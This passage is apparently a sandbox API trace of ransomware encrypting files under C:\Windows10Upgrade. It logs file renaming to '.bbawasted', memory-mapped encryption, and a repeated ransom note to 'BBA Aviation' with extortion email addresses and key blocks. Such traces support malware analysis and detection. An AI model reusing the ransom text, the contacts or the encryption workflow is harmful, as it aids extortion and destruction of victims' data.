[0240.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6c4b88 [0240.229] lstrcpyW (in: lpString1=0x6c4c02, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0240.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0240.229] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f98) returned 1 [0240.230] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0240.230] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0240.230] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0240.232] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0240.233] SetEndOfFile (hFile=0x294) returned 1 [0240.234] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0240.234] lstrcpyW (in: lpString1=0x6c4c02, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0240.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js.bbawasted")) returned 1 [0240.235] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0240.235] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0240.235] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x2e7dba [0240.235] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e7dba) returned 0x1610000 [0240.235] CloseHandle (hObject=0x290) returned 1 [0240.889] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0241.015] CloseHandle (hObject=0x280) returned 1 [0241.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa1d0 [0241.015] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6bd0) returned 1 [0241.016] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x6aa218 | out: pbBuffer=0x6aa218) returned 1 [0241.016] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0241.016] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6708) returned 1 [0241.017] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0241.017] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0241.028] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0241.029] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa1d0 | out: hHeap=0x660000) returned 1 [0241.029] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.029] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]m5UxqkkiOxygt9s9UAHwnZqjNH1BAf5zPKlmVArEiaBrozOkLpy4Ppq3lWo1Kzzh\r\nnHqjqJLlTXflZX8qD3Bt3GRNitSvJNsiVbf8InCEgkyNXlIH8tSbpPYs7WQw6SFc\r\nMusBk3OMaRwS219fvzC3u7AlOpsjGaT8jo88ds2FMj2JyKcinYvQh9or4LxbLSS2\r\nQZPezvVLBrahuRS/4fh4/lN1J45N0dRUVG2hMNAfwwkHjkVvqMAzQ3R1LnLe+CqO\r\nydaL/HXJIHyYjhR3Joewm77oVfM+T17qNSKnWgrz1s3Am+byDfxC28HhTpVz9W1q\r\nEkuF5oq9s7nQ2u9jZmTYFLaMAHrilhpQo/vJh15Cd82GbprbZV2nlAHclNYF1+EX\r\nGT3ltv5vy51qQC9T0tHwb0lCI8qkKT32Ra9G/pPggDZc7QvWReAixOUJ0NCNAnhb\r\nmbmSh9eT0Uwt/cb6cCSrr/ZdVJ9wpRvoG89XSkngaHcO9VoCPirgaVfShfz3cvKr\r\nm5+CReRjKheJPR9XvBb4vyKxuCxa33yJUd1Nc45xz7tbbKZbEVi7Ppb8XHUMtbLF\r\nj1B7VNs/GtKblNeA+BGRzX/sIO3K6HzorbBuS4xNozrMZBARw8hrUL/DJd7/+1et\r\negudFzC2xhDQpQUpUbAQgXCS+lSSek9Hi0HCNENaRfh=[end_key]\r\nKEEP IT\r\n") returned 984 [0241.029] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0241.029] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0241.029] SetEndOfFile (hFile=0x294) returned 1 [0241.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.032] CloseHandle (hObject=0x294) returned 1 [0241.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0241.033] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a74e0 | out: hHeap=0x660000) returned 1 [0241.033] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6350) returned 1 [0241.034] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0241.034] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0241.034] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png") returned 60 [0241.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6c4b88 [0241.034] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0241.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.034] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6460) returned 1 [0241.035] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0241.035] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0241.035] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0241.146] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0241.148] SetEndOfFile (hFile=0x290) returned 1 [0241.148] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0241.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.148] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0241.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png.bbawasted")) returned 1 [0241.149] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0241.149] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0241.150] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x875 [0241.150] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x875) returned 0x5f0000 [0241.150] CloseHandle (hObject=0x294) returned 1 [0241.152] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0241.152] CloseHandle (hObject=0x280) returned 1 [0241.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0241.152] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0241.153] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0241.153] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0241.153] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6570) returned 1 [0241.154] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0241.154] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0241.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0241.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0241.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.165] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WOV9Y2GgOP7GQZuOHKtywt3hkMKbcsv7fMUFgP53o1RZYU/vAEdb/2bef/9gj2mH\r\nBjUHQYY0OjIij69xYJzsjwv7gFhLmhs+fiDDmq0tiec49clkjSXJQIor2p+v1KFX\r\n4fMjVQB+dohT89QZaosjZPWGrdG6hPXwZGbepPEfw3+zSuJICUR9ja2UgxRM+ZEg\r\nteutGBj25YUwRK1Ep1Eq7hkmP2/gqkVDFgJej3mjIF2EG8swnYbV+n4JWE7s9aAZ\r\noi+f9FpYPOyUT/MKGhEpI6osI4+Sp//xVG5YbeV1RtmaExJPMBYjzvfq3DCdigce\r\npQ3uLMal3CiHI9gAztExZ4mPybTpXFfct8DBqjJ/a8ZA3A9TAGwuJ6eiRqW+/Jka\r\naFdEm46dDtOBYlJKM8Bu0bpoLFiRQmlW4VCclR+sJrG1CtHvLON0aL319Wt9qeNs\r\nuk7ts5GjP7JbMYwVTUnoxkpf2ItwoEDI68T/LdEDZBuI3xjloyHTMoF8Z+LalAtL\r\nrMs4x7hEvdH6lyLdERXe3eqIpR+2+kVAGjsSORnspPXOiNjTJKRDL4Iyx+Ye5YNx\r\nrvq3jw9RckHW9rGl+y5rMCCqd3G5RVSaLP+EEmjinHlzietDUgaeuaVoMe5nn3JU\r\nf9kgwoZUX8bkEEIftrw+XS8IMShvIZXsddM8QIGfXN+=[end_key]\r\nKEEP IT\r\n") returned 984 [0241.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0241.165] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0241.166] SetEndOfFile (hFile=0x290) returned 1 [0241.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.169] CloseHandle (hObject=0x290) returned 1 [0241.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0241.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a79f0 | out: hHeap=0x660000) returned 1 [0241.170] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a65f8) returned 1 [0241.171] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0241.171] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0241.171] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png") returned 69 [0241.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x294) returned 0x6c4b88 [0241.171] lstrcpyW (in: lpString1=0x6c4c12, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0241.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.171] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0241.172] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0241.172] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0241.172] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0241.172] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0241.174] SetEndOfFile (hFile=0x290) returned 1 [0241.174] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0241.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.174] lstrcpyW (in: lpString1=0x6c4c12, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0241.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png.bbawasted")) returned 1 [0241.176] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0241.176] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0241.177] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x8a4 [0241.177] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a4) returned 0x5f0000 [0241.177] CloseHandle (hObject=0x280) returned 1 [0241.292] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0241.293] CloseHandle (hObject=0x294) returned 1 [0241.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aabf8 [0241.293] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6818) returned 1 [0241.294] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x6aac40 | out: pbBuffer=0x6aac40) returned 1 [0241.294] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0241.294] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6b48) returned 1 [0241.295] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0241.295] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0241.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0241.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x660000) returned 1 [0241.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.307] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bIn10odj//K7ggbw3Elh5eX7fdGpKYHwG4dNKk2Uwkd+PKwvyRaz6rieGGsag/ko\r\nzuVUyj5CzAuo3tauVP6czDZjG+0qlCS45gaj71EDiJs21jH6RNrntAAj8YfEbgO/\r\nJ0P/ZKck9bf9rykhTIG1QSKkAjt4R4+F3F6YWRyKoTm2mMQI9ksZGtilnHc/yz19\r\n9CFYfZkRDaSstv8+PJQCDnY3sncr3Qmcy6yg6zHOFDzv7rKn1byEtTCT+o1iyYnX\r\nUIuETHib+BJU3vjHAmYxFX97LENUgc0OjBCi4xvtKU3iWfbwqe40sO+pZM53XCrT\r\najDgBMYDJyNcIm20L9DzopO5xbS+WGn/8K7RBtGLad7UO5S2PfU8ZCMEvefCslRr\r\nx4CxikIB+ycRtL5vQ4XYbU8Q52vihRtJx/62PfXRlyswVuKhtqJWozqEia35CXmx\r\nurAwQ+6X2RYXo6xZArriCNySinvWCr6ojsk1DDcyLenOnFmqTsKTqL/oDHyNc7BQ\r\nKbjiTpBvIBt6PAWmOSMrUthILE3BEUWGSCqIjKrtUNtl6hyAIS2qpw8XVUs7jZ5o\r\nxfHgn4pb4B8AfLMaE+wHrFp+84P5Bw0dNkY0RC3ZOqIfLonBfItpvPPzqoa/jU2s\r\nB2QpeuFNl0FMrI08eYUGGOibxj84HB/uGxt9s/o2vi0=[end_key]\r\nKEEP IT\r\n") returned 984 [0241.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0241.307] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0241.308] SetEndOfFile (hFile=0x290) returned 1 [0241.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.311] CloseHandle (hObject=0x290) returned 1 [0241.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0241.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb018 | out: hHeap=0x660000) returned 1 [0241.311] ResetEvent (hEvent=0x274) returned 1 [0241.311] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6928) returned 1 [0241.312] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0241.312] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0241.312] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\upgrader_win10.log") returned 42 [0241.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25e) returned 0x6c4b88 [0241.312] lstrcpyW (in: lpString1=0x6c4bdc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0241.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.313] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0241.313] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0241.313] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0241.313] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_win10.log.bbawasted_info" (normalized: "c:\\windows10upgrade\\upgrader_win10.log.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0241.314] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0241.316] SetEndOfFile (hFile=0x290) returned 1 [0241.316] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0241.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.316] lstrcpyW (in: lpString1=0x6c4bdc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0241.316] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_win10.log" (normalized: "c:\\windows10upgrade\\upgrader_win10.log"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_win10.log.bbawasted" (normalized: "c:\\windows10upgrade\\upgrader_win10.log.bbawasted")) returned 1 [0241.318] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_win10.log.bbawasted" (normalized: "c:\\windows10upgrade\\upgrader_win10.log.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0241.318] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0241.318] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x5044 [0241.318] MapViewOfFile 